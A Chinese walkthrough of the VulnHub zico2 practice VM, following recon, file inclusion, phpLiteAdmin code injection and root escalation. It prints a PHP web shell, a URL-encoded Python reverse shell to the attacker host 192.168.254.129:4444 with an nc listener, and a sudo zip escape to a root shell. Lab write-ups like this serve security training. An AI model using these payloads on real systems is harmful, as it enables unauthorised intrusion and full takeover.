zico2靶机

信息收集：

靶机地址：https://download.vulnhub.com/zico/zico2.ova

（1）ip扫描，靶机跟kali在同一个网段即可

nmap 192.168.254.0/24 -sn | grep -B 2 '00:0C:29:5B:8B:7F'

（2）端口扫描

 nmap -A 192.168.254.135

（3）目录扫描

dirsearch -u  http://192.168.254.135

（4）访问页面，点击功能点发现可能存在文件包含漏洞

（5）在地址栏将page的值改为../../../../../etc/passwd，页面展示了该文件的内容，说明确实存在文件包含漏洞

（6）访问刚才目录扫描出来的路径，拼接/dbadmin，点击test_db.php，发现一个登录界面，弱口令admin，登录成功

getshell：

（1）登录后查询数据库内容，发现两个账号和密码

（2）密码为MD5加密

账号：root   密码：34kroot34
账号：zico   密码：zico2215@

（3）尝试ssh连接，发现都不行

ssh root@192.168.254.135
ssh zico@192.168.254.135

（4）在kali查询phpLiteAdmin有没有可利用的漏洞，结果显示1.9.3版本存在远程php代码注入漏洞，下面进行漏洞利用

searchsploit phpliteadmin

（5）在刚才的phpLiteAdmin管理页面创建一个数据库，再在该数据库下创建一个表，在表中创建一个字段，字段名称，默认值为<?php phpinfo();?>，插入一行内容

（6）利用文件包含访问刚才的内容，发现解析了

（7）上一步成功显示了phpinfo信息说明漏洞可以利用

<?php echo system($_GET["pass"]);?>

（8）使用python来反弹shell

../../../../usr/databases/hack.php&pass=python%20-c%20%27import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%22192.168.254.129%22,4444));os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);%20os.dup2(s.fileno(),2);p=subprocess.call([%22/bin/sh%22,%22-i%22]);%27

（9）kali监听，成功反弹到了

nc -lvnp 4444  

提权：

（1）进入到/home/zico目录，查看to_do.txt文件

cd /home/zico
cat to_do.txt

（2）进入到wordpress目录下，发下wordpress配置文件，查看此文件，发现账号密码

cd wordpress
ls -al
cat wp-config.php

（3）使用 ssh 远程连接

ssh zico@192.168.254.135

（4）输入 sudo -l ，查看哪些命令具有 root 权限

（5）可以利用zip命令来进行提权

touch /tmp/exploit，在/tmp目录下创建一个exploit名字的文件
 
sudo -u root zip /tmp/exploit.zip /tmp/exploit -T --unzip-command="sh -c /bin/bash"

（6）提权成功